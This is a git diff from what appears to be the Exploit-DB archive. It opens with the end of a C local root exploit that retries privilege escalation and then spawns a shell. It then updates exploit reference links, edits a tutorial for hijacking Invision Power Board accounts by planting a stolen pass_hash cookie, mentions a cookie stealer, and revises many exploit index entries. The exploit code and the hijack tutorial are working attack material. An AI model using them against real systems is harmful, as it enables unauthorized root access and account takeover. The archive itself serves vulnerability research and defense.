+      fprintf(stderr, "Unknown argument %s\n", argName);
+      return(1);
+    }
+  }
+
+  fprintf(stderr, "%s: setting up environment ...\n", programmName);
+
+  if(!osRelease) {
+    if(detectOsRelease()) {
+      fprintf(stderr, "Failed to detect OS version, continuing anyway\n");
+    }
+  }
+
+  umountPathname=findUmountBinaryPathname("/bin");
+  if((!umountPathname)&&(getenv("PATH")))
+    umountPathname=findUmountBinaryPathname(getenv("PATH"));
+  if(!umountPathname) {
+    fprintf(stderr, "Failed to locate \"umount\" binary, is PATH correct?\n");
+    goto preReturnCleanup;
+  }
+  fprintf(stderr, "%s: using umount at \"%s\".\n", programmName,
+      umountPathname);
+
+  pid_t nsPid=prepareNamespacedProcess();
+  if(nsPid<0) {
+    goto preReturnCleanup;
+  }
+
+// Gaining root can still fail due to ASLR creating additional
+// path separators in memory addresses residing in area to be
+// overwritten by buffer underflow. Retry regaining until this
+// executable changes uid/gid.
+  int escalateMaxAttempts=10;
+  int excalateCurrentAttempt=0;
+  while(excalateCurrentAttempt<escalateMaxAttempts) {
+    excalateCurrentAttempt++;
+    fprintf(stderr, "Attempting to gain root, try %d of %d ...\n",
+        excalateCurrentAttempt, escalateMaxAttempts);
+
+    attemptEscalation();
+
+    struct stat statBuf;
+    int statResult=stat("/proc/self/exe", &statBuf);
+       int stat(const char *pathname, struct stat *buf);
+    if(statResult) {
+      fprintf(stderr, "Failed to stat /proc/self/exe: /proc not mounted, access restricted, executable deleted?\n");
+      break;
+    }
+    if(statBuf.st_uid==0) {
+      fprintf(stderr, "Executable now root-owned\n");
+      goto escalateOk;
+    }
+  }
+
+  fprintf(stderr, "Escalation FAILED, maybe target system not (yet) supported by exploit!\n");
+
+preReturnCleanup:
+  if(namespacedProcessPid>0) {
+    if(killNamespacedProcessFlag) {
+      kill(namespacedProcessPid, SIGKILL);
+    } else {
+// We used an existing namespace or chroot to escalate. Remove
+// the files created there.
+      fprintf(stderr, "No namespace cleanup for preexisting namespaces yet, do it manually.\n");
+    }
+  }
+
+  if(!exitStatus) {
+    fprintf(stderr, "Cleanup completed, re-invoking binary\n");
+    invokeShell("/proc/self/exe");
+    exitStatus=1;
+  }
+  return(exitStatus);
+
+escalateOk:
+  exitStatus=0;
+  goto preReturnCleanup;
+}
\ No newline at end of file
diff --git a/exploits/multiple/remote/1292.pm b/exploits/multiple/remote/1292.pm
index a021a67c1..080bcf98c 100644
--- a/exploits/multiple/remote/1292.pm
+++ b/exploits/multiple/remote/1292.pm
@@ -1,4 +1,4 @@
-# Reference: http://www.milw0rm.com/id.php?id=1231 (kcope) /str0ke
+# Reference: http://www.milw0rm.com/id.php?id=1231 (https://www.exploit-db.com/exploits/1231/) (kcope) /str0ke
 
 # 
 # Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution
diff --git a/exploits/php/webapps/1014.txt b/exploits/php/webapps/1014.txt
index e1f27aec9..bd2c3e01a 100644
--- a/exploits/php/webapps/1014.txt
+++ b/exploits/php/webapps/1014.txt
@@ -2,13 +2,13 @@
 
 Tutorial for the recent exploit released by Petey Beege.
 
-1. Get the exploit from http://www.milw0rm.com/id.php?id=1013
+1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
 2. Make sure you have LWP::UserAgent perl module if not do this:
      a. perl -MCPAN -e 'shell'
      b. inside the perl shell, do this 'install LWP::UserAgent'
 3. Run the exploit. Get the password hash for the desired login id
 
-ex. inv.pl http://forums.elitesite.com 2 2
+ex. inv.pl http://forums.example.com 2 2
 
 Where 2 is the login id and 2 for version 2 of IPB.
 
@@ -18,13 +18,13 @@ C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb
 
 Add the following entries:
 
-forums.elitesite.com        FALSE        /        FALSE		1148708747	  member_id        1
-forums.elitesite.com        FALSE        /        FALSE		1148708747        pass_hash        ecb735f70028a9cdb819828f4aced78c
+forums.example.com        FALSE        /        FALSE		1148708747	  member_id        1
+forums.example.com        FALSE        /        FALSE		1148708747        pass_hash        ecb735f70028a9cdb819828f4aced78c
 
 Notice the value of member_id and pass_hash taken from the values
 generated by the exploit.
 
-5. Fire up Mozilla Firefox and login to http://forums.elitesite.com
+5. Fire up Mozilla Firefox and login to http://forums.example.com
 
 Enjoy!
 
diff --git a/exploits/php/webapps/1367.php b/exploits/php/webapps/1367.php
index fcee18817..2d9839b50 100644
--- a/exploits/php/webapps/1367.php
+++ b/exploits/php/webapps/1367.php
@@ -3,7 +3,7 @@
 #
 # Flatnuke 2.5.6 privilege escalation / remote commands execution exploit
 # (works with magic_quotes_gpc off, try this with 2.5.5:
-# http://www.milw0rm.com/id.php?id=1140)
+# http://www.milw0rm.com/id.php?id=1140 (https://www.exploit-db.com/exploits/1140/))
 #
 # coded by rgod at http://rgod.altervista.org
 # mail: retrogod at aliceposta it
diff --git a/exploits/php/webapps/1457.txt b/exploits/php/webapps/1457.txt
index b692d4444..79938ae8c 100644
--- a/exploits/php/webapps/1457.txt
+++ b/exploits/php/webapps/1457.txt
@@ -1,4 +1,4 @@
-# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
+# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103 (https://www.exploit-db.com/exploits/1103/)
 # Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
 # Author: threesixthousan 
 
diff --git a/exploits/windows/remote/1224.html b/exploits/windows/remote/1224.html
index 37299d50f..10286df88 100644
--- a/exploits/windows/remote/1224.html
+++ b/exploits/windows/remote/1224.html
@@ -8,7 +8,7 @@ _______________________________________________________________________________
    iS;       .sS*       Copyright (C) 2003-2005 by Berend-Jan Wever.           
   .SS       sSSSSSSP    <berendjanwever@gmail.com>                             
 _______________________________________________________________________________
-          Official release: http://www.milw0rm.com/id.php?id=1224              
+          Official release: http://www.milw0rm.com/id.php?id=1224 (https://www.exploit-db.com/exploits/1224/)
 
   This program is free software; you can redistribute it and/or modify it under
   the terms of the GNU General Public License version 2, 1991 as published by
@@ -224,7 +224,7 @@ _______________________________________________________________________________
 		    	"<H2>Exploit</H2>" +
 		    	"Attack URL (size: " +
 		    		number(sURL.length*2) + " bytes):<BR>" +
-		    	"&quot;" + escape(sURL) + "&quot;<BR><BR>";
+		    	""" + escape(sURL) + ""<BR><BR>";
 		    //  Ask if you want to get pwned
 		    exploitStatusElement.innerHTML =
 				"<BUTTON onclick=\"FiredFox();\">" +
diff --git a/exploits/windows/remote/693.c b/exploits/windows/remote/693.c
index 82744f4f6..f82820044 100644
--- a/exploits/windows/remote/693.c
+++ b/exploits/windows/remote/693.c
@@ -156,6 +156,6 @@ int main(int argc, char **argv)
 //2004-10-23
 //Ability Server 2.34 and below Remote APPE Buffer Overflow Exploit 	
 //KaGra
-//http://www.milw0rm.com/id.php?id=592
+//http://www.milw0rm.com/id.php?id=592 (https://www.exploit-db.com/exploits/592/)
 
 // milw0rm.com [2004-12-16]
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9c97018a3..81f375f6f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5255,6 +5255,7 @@ id,file,description,date,author,type,platform,port
 43718,exploits/windows/dos/43718.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Write",2018-01-17,"Google Security Research",dos,windows,
 43720,exploits/windows/dos/43720.js,"Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read",2018-01-17,"Google Security Research",dos,windows,
 43723,exploits/windows/dos/43723.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy",2018-01-17,"Google Security Research",dos,windows,
+43776,exploits/hardware/dos/43776.py,"Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service",2018-01-18,"Scott Gayou",dos,hardware,
 40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
 40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
 40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@@ -5680,7 +5681,7 @@ id,file,description,date,author,type,platform,port
 42361,exploits/multiple/dos/42361.html,"WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
 42362,exploits/multiple/dos/42362.html,"WebKit - 'WebCore::Node::nextSibling' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
 42363,exploits/multiple/dos/42363.html,"WebKit - 'WebCore::RenderSearchField::addSearchResult' Heap Buffer Overflow",2017-07-24,"Google Security Research",dos,multiple,
-42364,exploits/multiple/dos/42364.html,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
+42364,exploits/multiple/dos/42364.html,"WebKit - 'WebCore::InputType::element' Use-After-Free (1)",2017-07-24,"Google Security Research",dos,multiple,
 42365,exploits/multiple/dos/42365.html,"WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
 42366,exploits/multiple/dos/42366.html,"WebKit - 'WebCore::Node::getFlag' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
 42367,exploits/multiple/dos/42367.html,"WebKit - 'WebCore::getCachedWrapper' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
@@ -5790,7 +5791,7 @@ id,file,description,date,author,type,platform,port
 43164,exploits/hardware/dos/43164.py,"Vonage VDV-23 - Denial of Service",2017-11-21,Nu11By73,dos,hardware,
 43165,exploits/windows/dos/43165.cpp,"Microsoft Windows 10 - 'nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry)' Pool Memory Disclosure",2017-11-21,"Google Security Research",dos,windows,
 43166,exploits/multiple/dos/43166.js,"WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
-43167,exploits/multiple/dos/43167.js,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
+43167,exploits/multiple/dos/43167.js,"WebKit - 'WebCore::InputType::element' Use-After-Free (2)",2017-11-22,"Google Security Research",dos,multiple,
 43168,exploits/multiple/dos/43168.js,"WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
 43169,exploits/multiple/dos/43169.js,"WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
 43170,exploits/multiple/dos/43170.js,"WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read",2017-11-22,"Google Security Research",dos,multiple,
@@ -5852,8 +5853,8 @@ id,file,description,date,author,type,platform,port
 120,exploits/linux/local/120.c,"TerminatorX 3.81 - Local Stack Overflow / Local Privilege Escalation",2003-11-13,Li0n7,local,linux,
 122,exploits/windows/local/122.c,"Microsoft Windows - ListBox/ComboBox Control Local (MS03-045)",2003-11-14,xCrZx,local,windows,
 125,exploits/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",local,bsd,
-129,exploits/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation",2003-12-02,"Christophe Devine",local,linux,
-131,exploits/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation",2003-12-05,"Wojciech Purczynski",local,linux,
+129,exploits/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (1)",2003-12-02,"Christophe Devine",local,linux,
+131,exploits/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)",2003-12-05,"Wojciech Purczynski",local,linux,
 134,exploits/hp-ux/local/134.c,"HP-UX B11.11 - '/usr/bin/ct' Format String Privilege Escalation",2003-12-16,watercloud,local,hp-ux,
 140,exploits/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game",2004-01-02,c0wboy,local,linux,
 141,exploits/linux/local/141.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)",2004-01-06,"Christophe Devine",local,linux,
@@ -6506,7 +6507,7 @@ id,file,description,date,author,type,platform,port
 8189,exploits/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,local,windows,
 8193,exploits/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,local,windows,
 8201,exploits/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow",2009-03-13,SkD,local,windows,
-8214,exploits/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-03-16,SimO-s0fT,local,windows,
+8214,exploits/windows/local/8214.c,"Rosoft Media Player 4.2.1 (Windows XP SP2/3 French) - Local Buffer Overflow",2009-03-16,SimO-s0fT,local,windows,
 8231,exploits/windows/local/8231.php,"CDex 1.70b2 (Windows XP SP3) - '.ogg' Local Buffer Overflow",2009-03-18,Nine:Situations:Group,local,windows,
 8233,exploits/windows/local/8233.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow",2009-03-18,His0k4,local,windows,
 8234,exploits/windows/local/8234.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow (2)",2009-03-18,Encrypt3d.M!nd,local,windows,
@@ -9245,7 +9246,7 @@ id,file,description,date,author,type,platform,port
 41130,exploits/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",local,android,
 41144,exploits/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",local,windows,
 41149,exploits/osx/local/41149.md,"Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution",2017-01-23,"Filippo Cavallarin",local,osx,
-41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-24,"Donald Buczek",local,linux,
+41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",local,linux,
 41154,exploits/linux/local/41154.sh,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-25,"Xiphos Research Ltd",local,linux,
 41158,exploits/linux/local/41158.md,"Man-db 2.6.7.1 - Local Privilege Escalation",2015-12-02,halfdog,local,linux,
 41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation",2017-01-24,"Sebastian Krahmer",local,linux,
@@ -9282,6 +9283,7 @@ id,file,description,date,author,type,platform,port
 43494,exploits/windows/local/43494.cpp,"Jungo Windriver 12.5.1 - Local Privilege Escalation",2018-01-10,"Fidus InfoSecurity",local,windows,
 43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,
 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,
+43775,exploits/linux/local/43775.c,"glibc - 'getcwd()' Local Privilege Escalation",2018-01-16,halfdog,local,linux,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -9346,7 +9348,7 @@ id,file,description,date,author,type,platform,port
 42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation",2017-05-22,"Google Security Research",local,linux,
 42053,exploits/linux/local/42053.c,"KDE 4/5 - 'KAuth' Local Privilege Escalation",2017-05-18,Stealth,local,linux,
 42059,exploits/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,local,windows,
-42076,exploits/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",local,linux,
+42076,exploits/linux/local/42076.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",local,linux,
 42077,exploits/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",local,windows,
 42116,exploits/windows/local/42116.txt,"Parallels Desktop - Virtual Machine Escape",2017-06-05,"Mohammad Reza Espargham",local,windows,
 42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows,
@@ -9362,7 +9364,7 @@ id,file,description,date,author,type,platform,port
 42174,exploits/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Local Buffer Overflow (SEH)",2017-06-13,abatchy17,local,windows,
 42181,exploits/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,local,windows,
 42183,exploits/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation",2017-06-14,"Qualys Corporation",local,linux,
-42255,exploits/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-06-26,"Juan Sacco",local,linux,
+42255,exploits/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)",2017-06-26,"Juan Sacco",local,linux,
 42265,exploits/linux/local/42265.py,"Flat Assembler 1.7.21 - Local Buffer Overflow",2017-06-28,"Juan Sacco",local,linux,
 42267,exploits/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,local,windows,
 42270,exploits/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",local,solaris_x86,
@@ -9695,7 +9697,7 @@ id,file,description,date,author,type,platform,port
 675,exploits/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,remote,windows,
 681,exploits/linux/remote/681.c,"Citadel/UX 6.27 - Format String",2004-12-12,CoKi,remote,linux,504
 689,exploits/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,remote,multiple,
-693,exploits/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,remote,windows,21
+693,exploits/windows/remote/693.c,"Ability Server 2.34 - 'APPE' Remote Buffer Overflow",2004-12-16,darkeagle,remote,windows,21
 705,exploits/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,remote,multiple,10000
 711,exploits/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow",2005-04-24,cybertronic,remote,windows,21
 712,exploits/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow",2004-12-23,pucik,remote,linux,8000
@@ -9923,7 +9925,7 @@ id,file,description,date,author,type,platform,port
 1885,exploits/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow",2006-06-07,kingcope,remote,windows,80
 1889,exploits/hardware/remote/1889.txt,"D-Link DWL Series Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,remote,hardware,
 1906,exploits/windows/remote/1906.py,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow",2006-06-12,h07,remote,windows,
-1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,remote,windows,
+1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)",2006-06-15,c0rrupt,remote,windows,
 1940,exploits/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",remote,windows,445
 1965,exploits/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,remote,windows,445
 1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,remote,multiple,10000
@@ -9943,9 +9945,9 @@ id,file,description,date,author,type,platform,port
 2079,exploits/windows/remote/2079.pl,"eIQnetworks ESA - Syslog Server Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",remote,windows,12345
 2080,exploits/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",remote,windows,10616
 2082,exploits/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution",2006-07-28,"H D Moore",remote,multiple,
-2136,exploits/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",remote,hardware,
+2136,exploits/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (1)",2006-08-07,"Greg Sinclair",remote,hardware,
 2140,exploits/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)",2006-08-07,ri0t,remote,windows,10616
-2145,exploits/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-08,PATz,remote,hardware,
+2145,exploits/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (2)",2006-08-08,PATz,remote,hardware,
 2162,exploits/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",remote,windows,445
 2164,exploits/windows/remote/2164.pm,"Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",remote,windows,
 2185,exploits/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)",2006-08-14,K-sPecial,remote,linux,110
@@ -10451,7 +10453,7 @@ id,file,description,date,author,type,platform,port
 6217,exploits/windows/remote/6217.pl,"BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,remote,windows,
 6220,exploits/windows/remote/6220.html,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",remote,windows,
 6227,exploits/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution",2008-08-10,"Wojciech Pawlikowski",remote,windows,
-6229,exploits/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal",2008-08-11,"Simon Ryeo",remote,multiple,
+6229,exploits/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)",2008-08-11,"Simon Ryeo",remote,multiple,
 6236,exploits/multiple/remote/6236.txt,"BIND 9.5.0-P2 - 'Randomized Ports' Remote DNS Cache Poisoning",2008-08-13,Zbr,remote,multiple,
 6238,exploits/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow",2008-08-13,kralor,remote,windows,
 6248,exploits/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow",2008-08-15,SkOd,remote,windows,21
@@ -11508,7 +11510,7 @@ id,file,description,date,author,type,platform,port
 16710,exploits/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows,
 16711,exploits/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,remote,windows,
 16712,exploits/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,remote,windows,21
-16713,exploits/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2011-02-23,Metasploit,remote,windows,
+16713,exploits/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)",2011-02-23,Metasploit,remote,windows,
 16714,exploits/windows_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows_x86,2100
 16715,exploits/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,21
 16716,exploits/windows/remote/16716.rb,"Odin Secure FTP 4.1 - 'LIST' Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
@@ -14647,7 +14649,7 @@ id,file,description,date,author,type,platform,port
 31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",remote,windows,
 31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php,
 31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix,
-31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-18,Sumit,remote,windows,80
+31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80
 31737,exploits/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,remote,windows,
 31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,
 31757,exploits/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,
@@ -14658,7 +14660,7 @@ id,file,description,date,author,type,platform,port
 31770,exploits/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",remote,multiple,
 31788,exploits/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution",2014-02-20,"Julien Ahrens",remote,windows,
 31789,exploits/windows/remote/31789.py,"PCMan FTP Server 2.07 - Remote Buffer Overflow",2014-02-20,Sumit,remote,windows,21
-31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-22,"OJ Reeves",remote,windows,
+31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)",2014-02-22,"OJ Reeves",remote,windows,80
 31820,exploits/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",remote,unix,
 31828,exploits/hardware/remote/31828.txt,"Barracuda Spam Firewall 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",remote,hardware,
 31831,exploits/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",remote,windows,30000
@@ -16233,7 +16235,7 @@ id,file,description,date,author,type,platform,port
 1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)",2005-05-26,mh_p0rtal,webapps,asp,
 1012,exploits/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",webapps,asp,
 1013,exploits/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",webapps,php,
-1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-27,"Danica Jones",webapps,php,
+1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)",2005-05-27,"Danica Jones",webapps,php,
 1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",webapps,asp,
 1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,webapps,php,
 1017,exploits/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,webapps,php,
@@ -19961,7 +19963,7 @@ id,file,description,date,author,type,platform,port
 6677,exploits/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' SQL Injection",2008-10-05,Piker,webapps,php,
 6678,exploits/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,webapps,php,
 6679,exploits/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,webapps,php,
